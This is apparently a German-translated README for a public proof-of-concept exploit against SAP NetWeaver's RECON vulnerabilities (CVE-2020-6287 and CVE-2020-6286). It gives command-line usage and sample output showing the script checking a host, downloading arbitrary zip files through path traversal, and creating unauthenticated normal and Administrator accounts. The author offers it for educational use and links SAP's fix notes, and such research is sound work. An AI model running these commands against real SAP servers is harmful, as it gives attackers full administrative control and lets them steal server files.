
PoC für CVE-2020-6287, CVE-2020-6286 (SAP-RECON-Schwachstelle)
PoC für CVE-2020-6287, CVE-2020-6286 (SAP RECON-Schwachstelle)
Pffff! RECON (Remotely Exploitable Code On NetWeaver)? Leute, ernsthaft? Das war der beste Codename, den ihr euch ausgedacht habt? :)
Dieses Skript ermöglicht es, die fehlende Autorisierungsprüfung im SAP LM Configuration Wizard zu überprüfen, und als PoC-Skript nutzt es Pfad-Traversal in der queryProtocol-Methode aus.
Directory Traversal erlaubt es, beliebige zip-Dateien vom SAP-Server herunterzuladen.
Dieses Projekt wurde nur zu Bildungszwecken erstellt und darf nicht für Gesetzesverstöße oder persönlichen Gewinn genutzt werden.
Der Autor dieses Projekts ist nicht verantwortlich für mögliche Schäden, die durch das Material dieses Projekts verursacht werden.
Ursprüngliche Entdeckung:
CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.
Geben Sie einfach den Hostnamen/die IP des SAP NW AS Java an.
Es gibt zusätzliche Optionen:
-c – prüfen, ob der SAP-Server für RECON anfällig ist-f – zip-Datei vom SAP-Server herunterladen-u – SAP JAVA-Benutzer mit der Rolle erstellenAuthenticated User-a – SAP JAVA-Benutzer mit der Rolle Administrator erstellenBsp.: Zip-Datei herunterladen
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
Bsp.: SAP JAVA-Benutzer erstellen
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
Bsp.: SAP JAVA-Administrator-Benutzer erstellen
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner
Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Java NW host (default: 127.0.0.1)
-P PORT, --port PORT Java NW web port (default: tcp/50000)
-p PROXY, --proxy PROXY
Use proxy (ex: 127.0.0.1:8080)
-s, --ssl enable SSL
-c, --check just detect vulnerability
-f ZIPFILE, --zipfile ZIPFILE
ZIP file to read. CVE-2020-6286
-u, --user Create simple JAVA user. CVE-2020-6287
-a, --admin Create JAVA user with role "Administrator". CVE-2020-6287
--timeout TIMEOUT HTTP connection timeout in second (default: 10)
-v, --verbose verbose mode